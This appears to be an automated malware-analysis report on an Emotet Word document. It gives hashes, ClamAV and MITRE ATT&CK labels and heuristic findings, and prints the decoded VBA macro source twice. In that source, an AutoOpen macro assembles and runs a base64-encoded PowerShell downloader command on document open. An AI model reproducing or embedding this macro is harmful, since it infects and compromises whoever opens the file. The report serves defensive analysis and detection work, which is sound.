Emotet Office (OLE) malware analysis — malicious · e6e979e58bba5c21

MALICIOUS

Office (OLE)

107.2 KB Created: 2018-06-08 20:47:00 Authoring application: Microsoft Office Word First seen: 2018-06-25

MD5: a06403523797597bafc670332279fcda SHA-1: 7734b9af80d5e219d376be15772bad2d351f11be SHA-256: e6e979e58bba5c2120792a02d0bf7a3cbf127f6d680b3a69c8f3639efc241a09

210 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File T1059 Command and Scripting Interpreter

The sample contains legacy WordBasic markers and a critical heuristic firing for a Shell() call within VBA, indicating it's designed to execute external commands. ClamAV identifies it as Emotet, a known downloader family. The Autoopen macro is used to trigger the execution of the Shell command, which is the primary mechanism for delivering a secondary payload.

Heuristics 7

ClamAV: Doc.Downloader.Emotet-6899214-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6899214-0
VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code

Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA

Matched line in script

Next
fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
For uwMYLz = OGUFF To BcWSLq

VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
End Function
Sub Autoopen()
On Error Resume Next
```
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12519 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12519 bytes
SHA-256: `a73e5f7f56b9b6ca5300ddc9d33ca2961a935f0bccbc2c913cb8364fed73fe45`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "foNiJLsQr" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function fSODOmNMk() On Error Resume Next For qfbsO = aVEAE To QrZTPP For qLwNi = lEGdv To 86061 jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37)))) Next OLiIF = 28652 - 24599 Next For NtPipw = IPGRt To zocRb For mcGwp = PaUTFj To 23178 XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37)))) Next KqaDiq = 88191 - 32405 Next fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641) For uwMYLz = OGUFF To BcWSLq For RfkLA = jbnvA To 61731 cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37)))) Next FzAqR = 1268 - 72813 Next End Function Sub Autoopen() On Error Resume Next For WPzDPb = iHfUcH To nNfcE For hUFQij = pzpzf To 33750 pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37)))) Next wiSZMW = 1552 - 52369 Next fSODOmNMk For ljhdJ = IiScnp To bbbYiC For KljRXp = WXmvBi To 37475 wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37)))) Next HPWDtw = 60134 - 44708 Next End Sub Attribute VB_Name = "WiZzDDDOkw" Function WBUzimvvWWf() On Error Resume Next For PLBOYM = UkZGQ To YEKaR For bWAuj = kzKiPl To 53753 cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37)))) Next jjzui = 77618 - 16584 Next buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA" For RBqlfk = usUNJJ To ZnwWp For fPiQTz = jRrRj To 18717 COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37)))) Next NRbmF = 48193 - 37018 Next JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ" For qzzpaF = JlrnBr To POiqd For zwUuVw = djMMqi To 87585 SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37)))) Next iEWFqE = 6539 - 23374 Next RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM" For RdkbTI = vKOpnb To rPmQT For VkWwFi = sphbqS To 55661 wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37)))) Next tsvHC = 95823 - 39025 Next MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW" For mUvXFO = dnHkWV To iUUHbw For wdoIlk = HjhkmE To 40678 aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37)))) Next Ekqfz = 73952 - 5927 Next zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg" For zhnjsm = OIfcT To jMDir For krVhu = kqlhQr To 8997 iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37)))) Next Pppdd = 96028 - 40538 Next wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0" For rIHjV = tOmjm To rzVpGs For pPBOL = HIwLcs To 39400 RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37)))) Next Zplzh = 34241 - 91240 Next tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB" For lAZiH = qiMFHh To TRpwWM For sbrzL = wdiBp To 36481 dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37)))) Next HbUjb = 69432 - 94683 Next wpFzKRfMK = "AE" + "UASQBaA" + "GYAWgBT" + "ACsAYQBsAEUAY" + "gBaAFEAbwBvAG4" + "ARwBoA" + "E8AQwBpAE0" + "AUQBFAG8AMQBSA" + "E8Ae" For lnOaOq = nAiOH To Chtom For AUfpuv = wvaRjU To 75314 YVMwsz = (14678 / CBool(Klahq) - ubvov / Oct(93367 / Hex(13120) / wUfos + Rnd(MiutU / Fix(37)))) Next iMjsur = 86644 - 23000 Next ISkCjFoqsq = "ABzAFIAcwBsADQA" + "Rg" + "BkADIAT" + "wA3AF" For DUNks = zWuZq To SXsQEF For wbrhNE = iuCuDD To 90120 uASEzI = (24009 / CBool(zTdKM) - nbpmvP / Oct(87637 / Hex(23671) / zfSSFT + Rnd(Vnjhc / Fix(37)))) Next wAFpkP = 83880 - 25785 Next TiILo = "cAZABtAFEANQBoA" + "EgAZQ" + "AzAEkAbQBDADg" + "AbQBXAF" + "QAbQAvACs" + "AYgAw" + "AE8AKwBwAHo" + "AMQBGADYAUQBX" + "ADYATA" WBUzimvvWWf = buSHckDu + JZuFw + RwZzjtBObYt + MEdnBRO + zZcVBRX + wcBwiNaWcV + tNqcK + wpFzKRfMK + ISkCjFoqsq + TiILo End Function Function HwHznw() On Error Resume Next For uOtGbE = IfqiN To YhqHs For wqdiMv = pjGfdU To 48879 kDZws = (92465 / CBool(iBqtf) - bYwcXs / Oct(29157 / Hex(86754) / jjLwO + Rnd(CzNNnC / Fix(37)))) Next dQIzCu = 22598 - 55191 Next JSVFCzbdnwF = "BC" + "AGwAa" + "wAwADgAQgA0A" + "DQAawBZADMAcABp" + "AGsAdABEAHAAYgB" + "6AGEAOQ" + "AvAG4AOABwAF" For SPzOIH = GcKXU To snuhT For Bdjrdn = iUXpUh To 76696 NvBAcu = (95057 / CBool(ldfTK) - UFVai / Oct(52946 / Hex(19482) / XTaNZh + Rnd(mppjXi / Fix(37)))) Next thrhDX = 89813 - 27419 Next IErrqiXAVn = "cA" + "dQB" + "jAE" + "kA" + "QwBYADAAQwBw" + "AEUATwBJADcANQB" + "RAEUAagBhAEcAe" + "gBhAFMALwB0AHo" + "AdwB4AFg" + "ASQBLAFo" For TkKzSU = wMlbXh To OVPXz For pnmtdM = jBXmrJ To 41075 dOiQS = (90577 / CBool(UlDTLH) - LozvZI / Oct(62935 / Hex(95846) / WFfKz + Rnd(zjOMSk / Fix(37)))) Next hGjtw = 36619 - 1710 Next SwFhh = "AMQAzADAAOQB" + "nAEkAcABsAG0" + "AcwBWAEYAeQBLAF" + "IAbgBsAEoAdgBHA" + "EQAYwBUAFUA" + "SQBtAHQAZgBQ" + "AFQA" + "YgA5AHgAZwB" + "CAFQAVABzAHg" + "AdwB" For JAjGpj = wjMafz To Kmkuf For UFzpsF = sOjKN To 94142 NFzDIE = (22560 / CBool(izrEJW) - uIEnOV / Oct(7487 / Hex(2434) / OkcuhC + Rnd(MiWzF / Fix(37)))) Next hmaaja = 99906 - 95737 Next XPHEVHfYs = "6AHgAbgBBAFAAa" + "gBCAGYAeABi" + "AE4Ac" + "gA1AHEAbAB" + "5AGQAZwBN" + "AFIATQBXAEEAe" + "gBLADcATwBWA" + "DAAYgBS" + "ADY" For wkwUYG = iGJDIo To cRFcz For WmYqHb = MnodB To 86509 nswMiv = (73996 / CBool(PoBis) - wJawC / Oct(35718 / Hex(33022) / MGNwo + Rnd(vSjCP / Fix(37)))) Next kjStz = 3904 - 86029 Next QrjEHjN = "AbQ" + "A4ADQAVwA5AE8AY" + "wBsAFcA" + "YQBwA" For Xkocj = OdNiw To Kijszh For ZEzHz = iiOrh To 1486 ZvmbR = (71174 / CBool(kwREB) - pDFDa / Oct(88107 / Hex(31355) / TRZcoN + Rnd(ZAmfi / Fix(37)))) Next APsEaO = 37473 - 42919 Next hLIzJjhPXFh = "GkA" + "cQB" + "OAGQAVwBBAGYA" + "cAB5AC8AUABTAG" + "EAVgA5A" + "HAAOQBtA" + "Ew" For msGvZb = KQokF To iMzcX For KwfZX = onMzA To 60654 YsijWt = (76654 / CBool(BpVrtt) - lfEzqJ / Oct(22413 / Hex(53597) / Sjqln + Rnd(KQInj / Fix(37)))) Next zfdjj = 64644 - 18053 Next jmVbscdjkZ = "AWgAwAG" + "IAawB5AGgAbQBJ" + "AGEAWgA4ADQAMw" + "Bj" + "AHUAQgBCA" For JidMu = huCon To RWNmC For opiFi = Mjlzb To 27574 cCSzk = (10077 / CBool(qliQOT) - TwdRq / Oct(63475 / Hex(63070) / TiEzXz + Rnd(RhTnh / Fix(37)))) Next KwYdh = 46027 - 23232 Next BZBiWa = "E0AUgBIADcAWgA" + "4AGwAMABhAHAA" + "awBsAG" + "gAeQBHA" + "DYANABYA" + "E8AbABhAD" + "gAVwB" + "KAEU" For LOrOF = kIhkha To intlhf For Twwamp = zEoIJ To 39845 IQNkSG = (55320 / CBool(zjGGc) - KisAsi / Oct(68803 / Hex(28030) / QcQkm + Rnd(tbYFs / Fix(37)))) Next XjAPY = 894 - 19281 Next wYwzqdjEmIG = "AVQB" + "wAHoAdAA3AEgAN" + "ABwAGgA" + "SwB5AHgAVgB6AD" + "AAbgB0AE0" + "AZwBnAHE" + "AdABRAEkAWQBqAH" For NTfMjn = wIQlG To wwICVp For GHiBj = nwrlT To 66136 REwwD = (8834 / CBool(iwTHTm) - ZksMDK / Oct(8132 / Hex(80723) / liddz + Rnd(FXwDjc / Fix(37)))) Next zLzQpb = 19949 - 76128 Next LmfjTBb = "cAWg" + "BQAEEALwB" + "zAEQAZwBGADcA" + "VwBpADk" + "AOQBUAGMA" + "awBiAGM" + "AZAA3AGUA" + "SQB4ACsAWQBpA" + "HAANwBBAEMATg" + "A1AHkAYQBEAEI" HwHznw = JSVFCzbdnwF + IErrqiXAVn + SwFhh + XPHEVHfYs + QrjEHjN + hLIzJjhPXFh + jmVbscdjkZ + BZBiWa + wYwzqdjEmIG + LmfjTBb End Function Function NiSjqWaKi() On Error Resume Next For hzWOOz = QXVbw To SZazC For wLQFDf = hNmUcf To 35691 zfGlN = (11512 / CBool(jfLAup) - ZppYTr / Oct(28393 / Hex(32441) / SiiRKd + Rnd(twjzV / Fix(37)))) Next UOplzf = 70499 - 89952 Next wdtmAwfnbU = "AZwBYAEoAYQBmA" + "GIARQAzADMAWg" + "BJADE" + "ASwBUAFgAMgB" For kvoow = DMbwjo To DionCc For EOpWf = bjhtj To 61941 PzjdWh = (46578 / CBool(jECpFf) - GzJdH / Oct(55382 / Hex(98304) / FRJaC + Rnd(ihNzr / Fix(37)))) Next GzKRU = 8792 - 54712 Next psruI = "1ADgATABXAGI" + "Ac" + "gA3AGEAKwBmA" + "HQAR" + "wB" + "XAHMAVgBvA" For JmhZp = ckjFY To QbdLN For VVEWp = OHEHms To 16829 AiMTk = (68586 / CBool(lsuwHb) - HiWzD / Oct(26939 / Hex(67571) / PmzrL + Rnd(NVwqzV / Fix(37)))) Next lOKad = 42290 - 69456 Next LQjKnN = "FoATgAyAGwATABC" + "AEUAYQB" + "XA" + "HYASgBzAEoA" + "TQA2AGwAb" + "gBKAE8AeQBl" + "AEgA" + "bg" For KYhNrz = lmouU To OZVsYC For WwHKG = WQLZa To 84649 dFOPdT = (67059 / CBool(jLBCAa) - pohFT / Oct(22736 / Hex(12035) / QXHnd + Rnd(ZNOCV / Fix(37)))) Next JLGPE = 37322 - 70963 Next zohiPJmt = "BWADQ" + "AWQBJAGMAdQB" + "3AC8ASgB3AFoAR" + "ABuAGw" + "AKwBMAEkAZAB4A" + "HMAVwBRA" + "FIANwBqAGgARA" For kFIFdw = WrUYnX To zrWjFd For wmzfL = ihSAA To 51773 dLOBK = (58871 / CBool(CWtihr) - NOsYO / Oct(13698 / Hex(55376) / SIZRlw + Rnd(YUXMEN / Fix(37)))) Next cUWauH = 53953 - 86581 Next vlNzzlhiToB = "BMAHIAWQAyAGsA" + "dwB" + "oAGwAWQB" + "YAEkAawB6" + "AGc" + "AZQA5AF" NiSjqWaKi = wdtmAwfnbU + psruI + LQjKnN + zohiPJmt + vlNzzlhiToB End Function Function SdkMMcMi() On Error Resume Next For zTvQT = cmTqqs To bstmN For ZGVmEb = XBnMVK To 49546 czpfVw = (85349 / CBool(sOXuWt) - hItiTO / Oct(54046 / Hex(63633) / phCawH + Rnd(jSSzu / Fix(37)))) Next HrzhU = 56140 - 47467 Next izaZjEAo = "gAMwBGAEkAVQBSA" + "HAATgB1AD" + "AAVQBIAG0" + "AMABHADQA" + "MgAzADAARAAn" For jPiYFE = fGYAQw To ovSmks For bEtidB = fmuwI To 20217 SXBsD = (88338 / CBool(MtziF) - DDOhs / Oct(60940 / Hex(80577) / LkpcD + Rnd(ATiBI / Fix(37)))) Next jWXQuh = 98188 - 82263 Next aChKBju = "AC" + "kAIAAsAF" + "sAaQBvA" + "C4AQwBvAG0AcA" + "BSAGUAUwBz" + "AGkAbwBOAC4A" + "QwBPAG0A" For KuEYj = cXMGcU To HnMQA For zsOwV = khfwn To 20431 zqAqkD = (37465 / CBool(YvSufT) - PkEdhi / Oct(82718 / Hex(42654) / wiGzRw + Rnd(YwwVM / Fix(37)))) Next wbMjt = 52939 - 94379 Next NOAfwaRGWsj = "UAByAEUAcwBTAE" + "kA" + "bwBOAE0ATwBk" + "AGUAXQA6" + "ADo" For DqwGRu = KdCIUF To BzUJbW For wjzQJo = QAkPZw To 85753 IszCiO = (36019 / CBool(NsACZP) - kAaCF / Oct(13224 / Hex(1600) / IGRtcR + Rnd(vGBJpc / Fix(37)))) Next Yrffp = 69776 - 46566 Next zLHzOnM = "ARABFAEMAbwBNA" + "FAAUgBlAFMAcw" + "ApACA" + "AfABGAE8" + "AcgBlAEEA" + "YwB" + "IAC0ATwBCAGoAZ" + "QBDAFQAew" SdkMMcMi = izaZjEAo + aChKBju + NOAfwaRGWsj + zLHzOnM End Function Function sMJKiRLCHEQ() On Error Resume Next For mCBoA = wwnlH To qwMUp For UztAQa = abiWZR To 31823 AUPro = (33975 / CBool(wKOXha) - ciLpN / Oct(29869 / Hex(51581) / lmbDZ + Rnd(PZNUqk / Fix(37)))) Next czcAKr = 1427 - 67091 Next unijiEjh = "AgAG4ARQBXAC0AT" + "wBiAEoARQBDA" + "HQAIAAgAFMAeQBT" + "AFQAZQBNAC4ASQ" + "BPAC4AcwB0AHIAR" + "QBhAG" For ssJGwE = jDBrk To cQkrph For ADqqdA = ioDYaj To 98553 iuTpLO = (58184 / CBool(psFtV) - PSCTw / Oct(72696 / Hex(78050) / TdwXc + Rnd(AcREjh / Fix(37)))) Next qYAVWW = 75026 - 2220 Next LpYvsz = "0AcgBFAGEA" + "ZABlAHIAKAAkAF8" + "ALAB" + "bAFQARQB4AFQALg" + "BlAE4AQwBvAGQA" + "SQBOAEcA" + "XQA" + "6ADoAYQBzAGMA" + "SQBpACkAfQ" For XGLWYk = GiNGh To pqnljP For bBKoi = tBzcP To 3030 VFrMG = (41721 / CBool(GKVVb) - PiJhk / Oct(74214 / Hex(44707) / VWwWrz + Rnd(UIGzEh / Fix(37)))) Next kzbiN = 98877 - 11773 Next oVmvzuT = "AgACkALgBSAG" + "UAQQBkAFQA" + "bwBFAG4A" + "ZAA" + "oACk" + "AIAA=" sMJKiRLCHEQ = unijiEjh + LpYvsz + oVmvzuT End Function

SHA-256: a73e5f7f56b9b6ca5300ddc9d33ca2961a935f0bccbc2c913cb8364fed73fe45

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "foNiJLsQr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function fSODOmNMk()
On Error Resume Next
For qfbsO = aVEAE To QrZTPP
      For qLwNi = lEGdv To 86061
         jBfuKJ = (1660 / CBool(wzFzE) - pjwOp / Oct(51823 / Hex(85569) / CrSsi + Rnd(QTrJIS / Fix(37))))
Next
   OLiIF = 28652 - 24599
Next
For NtPipw = IPGRt To zocRb
      For mcGwp = PaUTFj To 23178
         XowCOs = (63149 / CBool(LbCqZq) - XCqdr / Oct(49922 / Hex(34896) / wasZV + Rnd(oJWFN / Fix(37))))
Next
   KqaDiq = 88191 - 32405
Next
fSODOmNMk = ivMiR + Shell(RGWiMLSrDPl + Chr(AiknkvBZ + vbKeyP + KwDLjItFSJJ) + "owers" + WBUzimvvWWf + HwHznw + NiSjqWaKi + SdkMMcMi + sMJKiRLCHEQ, 17641 - 17641)
For uwMYLz = OGUFF To BcWSLq
      For RfkLA = jbnvA To 61731
         cCbfB = (20271 / CBool(XvQkI) - dozjPf / Oct(6563 / Hex(88269) / OOAYG + Rnd(paKUZ / Fix(37))))
Next
   FzAqR = 1268 - 72813
Next
End Function
Sub Autoopen()
On Error Resume Next
For WPzDPb = iHfUcH To nNfcE
      For hUFQij = pzpzf To 33750
         pwOzJf = (50508 / CBool(TiAww) - LnLpww / Oct(34425 / Hex(5079) / jViDC + Rnd(RipLNZ / Fix(37))))
Next
   wiSZMW = 1552 - 52369
Next
fSODOmNMk
For ljhdJ = IiScnp To bbbYiC
      For KljRXp = WXmvBi To 37475
         wWZXmZ = (13339 / CBool(klzTGr) - orwiFz / Oct(125 / Hex(31548) / UBlLj + Rnd(lGLscF / Fix(37))))
Next
   HPWDtw = 60134 - 44708
Next
End Sub


Attribute VB_Name = "WiZzDDDOkw"
Function WBUzimvvWWf()
On Error Resume Next
For PLBOYM = UkZGQ To YEKaR
      For bWAuj = kzKiPl To 53753
         cpEQw = (56153 / CBool(jFzEz) - zTQlv / Oct(46621 / Hex(35294) / TPQRan + Rnd(ApUni / Fix(37))))
Next
   jjzui = 77618 - 16584
Next
buSHckDu = "HeLL -e IAAuACg" + "AKABnAGUA" + "VAAtAFYAQQ" + "ByAEkAYQBiAEwAZ" + "QAgACcAKg" + "BtA" + "EQAcgAqACcA" + "KQAuAE4AYQBNAGU" + "AWwAzA"
For RBqlfk = usUNJJ To ZnwWp
      For fPiQTz = jRrRj To 18717
         COaju = (5755 / CBool(GwAZUA) - JLvIwS / Oct(30617 / Hex(2514) / aRfUu + Rnd(BCdzFF / Fix(37))))
Next
   NRbmF = 48193 - 37018
Next
JZuFw = "CwAMQAxACwAMgBd" + "AC0ASgBvAGkA" + "bgAnACc" + "AKQAoAG4ARQ"
For qzzpaF = JlrnBr To POiqd
      For zwUuVw = djMMqi To 87585
         SjiUXF = (87587 / CBool(ISEUNC) - DPvXf / Oct(89211 / Hex(58565) / TcHSc + Rnd(iwTzQ / Fix(37))))
Next
   iEWFqE = 6539 - 23374
Next
RwZzjtBObYt = "BX" + "AC0AT" + "wBiAEoARQBDAH" + "QAIABJAG8AL" + "gBDAG8AbQBwAF" + "IARQBTAHM" + "ASQ" + "BPAG4ALgBEAEUA" + "RgBMAEEAdABlAFM"
For RdkbTI = vKOpnb To rPmQT
      For VkWwFi = sphbqS To 55661
         wXqJQ = (62379 / CBool(JjbJG) - iqDnjh / Oct(12292 / Hex(62656) / oWpJF + Rnd(dmwVw / Fix(37))))
Next
   tsvHC = 95823 - 39025
Next
MEdnBRO = "AVAB" + "yAEUAYQ" + "Bt" + "ACgAW"
For mUvXFO = dnHkWV To iUUHbw
      For wdoIlk = HjhkmE To 40678
         aRDqF = (99702 / CBool(rlbmDJ) - nuWXvp / Oct(82943 / Hex(14441) / UiCVH + Rnd(AkRVOt / Fix(37))))
Next
   Ekqfz = 73952 - 5927
Next
zZcVBRX = "wBzAHk" + "AcwBUA" + "EUATQAu" + "AG" + "kAbwAu" + "AG0ARQBNAE8Acg"
For zhnjsm = OIfcT To jMDir
      For krVhu = kqlhQr To 8997
         iVwOo = (27992 / CBool(mWIpma) - VYnBF / Oct(41264 / Hex(35428) / dzswIv + Rnd(jsnXOT / Fix(37))))
Next
   Pppdd = 96028 - 40538
Next
wcBwiNaWcV = "BZA" + "FMAdAByAEU" + "AYQBNAF0AWwB" + "DAG8AbgB2" + "AGUAUgBUAF0AOg" + "A6AEYAcgBvAE" + "0AYgBBAF" + "MARQA2ADQAcw" + "B0"
For rIHjV = tOmjm To rzVpGs
      For pPBOL = HIwLcs To 39400
         RHkrY = (50978 / CBool(niBoc) - WSTzX / Oct(70715 / Hex(75648) / zpuvCN + Rnd(vCJqR / Fix(37))))
Next
   Zplzh = 34241 - 91240
Next
tNqcK = "AHIASQBOAEcA" + "KAAgACcAVgBaAE" + "QAYg" + "BUAHMASgBB"
For lAZiH = qiMFHh To TRpwWM
      For sbrzL = wdiBp To 36481
         dMpVMu = (55422 / CBool(QqEjk) - GXvBLE / Oct(69998 / Hex(18788) / IbXHo + Rnd(vKPop / Fix(37))))
Next
   HbUjb = 69432 - 94683
Next
wpFzKRfMK = "AE" + "UASQBaA" + "GYAWgBT" + "ACsAYQBsAEUAY" + "gBaAFEAbwBvAG4" + "ARwBoA" + "E8AQwBpAE0" + "AUQBFAG8AMQBSA" + "E8Ae"
For lnOaOq = nAiOH To Chtom
      For AUfpuv = wvaRjU To 75314
         YVMwsz = (14678 / CBool(Klahq) - ubvov / Oct(93367 / Hex(13120) / wUfos + Rnd(MiutU / Fix(37))))
Next
   iMjsur = 86644 - 23000
Next
ISkCjFoqsq = "ABzAFIAcwBsADQA" + "Rg" + "BkADIAT" + "wA3AF"
For DUNks = zWuZq To SXsQEF
      For wbrhNE = iuCuDD To 90120
         uASEzI = (24009 / CBool(zTdKM) - nbpmvP / Oct(87637 / Hex(23671) / zfSSFT + Rnd(Vnjhc / Fix(37))))
Next
   wAFpkP = 83880 - 25785
Next
TiILo = "cAZABtAFEANQBoA" + "EgAZQ" + "AzAEkAbQBDADg" + "AbQBXAF" + "QAbQAvACs" + "AYgAw" + "AE8AKwBwAHo" + "AMQBGADYAUQBX" + "ADYATA"
WBUzimvvWWf = buSHckDu + JZuFw + RwZzjtBObYt + MEdnBRO + zZcVBRX + wcBwiNaWcV + tNqcK + wpFzKRfMK + ISkCjFoqsq + TiILo
End Function
Function HwHznw()
On Error Resume Next
For uOtGbE = IfqiN To YhqHs
      For wqdiMv = pjGfdU To 48879
         kDZws = (92465 / CBool(iBqtf) - bYwcXs / Oct(29157 / Hex(86754) / jjLwO + Rnd(CzNNnC / Fix(37))))
Next
   dQIzCu = 22598 - 55191
Next
JSVFCzbdnwF = "BC" + "AGwAa" + "wAwADgAQgA0A" + "DQAawBZADMAcABp" + "AGsAdABEAHAAYgB" + "6AGEAOQ" + "AvAG4AOABwAF"
For SPzOIH = GcKXU To snuhT
      For Bdjrdn = iUXpUh To 76696
         NvBAcu = (95057 / CBool(ldfTK) - UFVai / Oct(52946 / Hex(19482) / XTaNZh + Rnd(mppjXi / Fix(37))))
Next
   thrhDX = 89813 - 27419
Next
IErrqiXAVn = "cA" + "dQB" + "jAE" + "kA" + "QwBYADAAQwBw" + "AEUATwBJADcANQB" + "RAEUAagBhAEcAe" + "gBhAFMALwB0AHo" + "AdwB4AFg" + "ASQBLAFo"
For TkKzSU = wMlbXh To OVPXz
      For pnmtdM = jBXmrJ To 41075
         dOiQS = (90577 / CBool(UlDTLH) - LozvZI / Oct(62935 / Hex(95846) / WFfKz + Rnd(zjOMSk / Fix(37))))
Next
   hGjtw = 36619 - 1710
Next
SwFhh = "AMQAzADAAOQB" + "nAEkAcABsAG0" + "AcwBWAEYAeQBLAF" + "IAbgBsAEoAdgBHA" + "EQAYwBUAFUA" + "SQBtAHQAZgBQ" + "AFQA" + "YgA5AHgAZwB" + "CAFQAVABzAHg" + "AdwB"
For JAjGpj = wjMafz To Kmkuf
      For UFzpsF = sOjKN To 94142
         NFzDIE = (22560 / CBool(izrEJW) - uIEnOV / Oct(7487 / Hex(2434) / OkcuhC + Rnd(MiWzF / Fix(37))))
Next
   hmaaja = 99906 - 95737
Next
XPHEVHfYs = "6AHgAbgBBAFAAa" + "gBCAGYAeABi" + "AE4Ac" + "gA1AHEAbAB" + "5AGQAZwBN" + "AFIATQBXAEEAe" + "gBLADcATwBWA" + "DAAYgBS" + "ADY"
For wkwUYG = iGJDIo To cRFcz
      For WmYqHb = MnodB To 86509
         nswMiv = (73996 / CBool(PoBis) - wJawC / Oct(35718 / Hex(33022) / MGNwo + Rnd(vSjCP / Fix(37))))
Next
   kjStz = 3904 - 86029
Next
QrjEHjN = "AbQ" + "A4ADQAVwA5AE8AY" + "wBsAFcA" + "YQBwA"
For Xkocj = OdNiw To Kijszh
      For ZEzHz = iiOrh To 1486
         ZvmbR = (71174 / CBool(kwREB) - pDFDa / Oct(88107 / Hex(31355) / TRZcoN + Rnd(ZAmfi / Fix(37))))
Next
   APsEaO = 37473 - 42919
Next
hLIzJjhPXFh = "GkA" + "cQB" + "OAGQAVwBBAGYA" + "cAB5AC8AUABTAG" + "EAVgA5A" + "HAAOQBtA" + "Ew"
For msGvZb = KQokF To iMzcX
      For KwfZX = onMzA To 60654
         YsijWt = (76654 / CBool(BpVrtt) - lfEzqJ / Oct(22413 / Hex(53597) / Sjqln + Rnd(KQInj / Fix(37))))
Next
   zfdjj = 64644 - 18053
Next
jmVbscdjkZ = "AWgAwAG" + "IAawB5AGgAbQBJ" + "AGEAWgA4ADQAMw" + "Bj" + "AHUAQgBCA"
For JidMu = huCon To RWNmC
      For opiFi = Mjlzb To 27574
         cCSzk = (10077 / CBool(qliQOT) - TwdRq / Oct(63475 / Hex(63070) / TiEzXz + Rnd(RhTnh / Fix(37))))
Next
   KwYdh = 46027 - 23232
Next
BZBiWa = "E0AUgBIADcAWgA" + "4AGwAMABhAHAA" + "awBsAG" + "gAeQBHA" + "DYANABYA" + "E8AbABhAD" + "gAVwB" + "KAEU"
For LOrOF = kIhkha To intlhf
      For Twwamp = zEoIJ To 39845
         IQNkSG = (55320 / CBool(zjGGc) - KisAsi / Oct(68803 / Hex(28030) / QcQkm + Rnd(tbYFs / Fix(37))))
Next
   XjAPY = 894 - 19281
Next
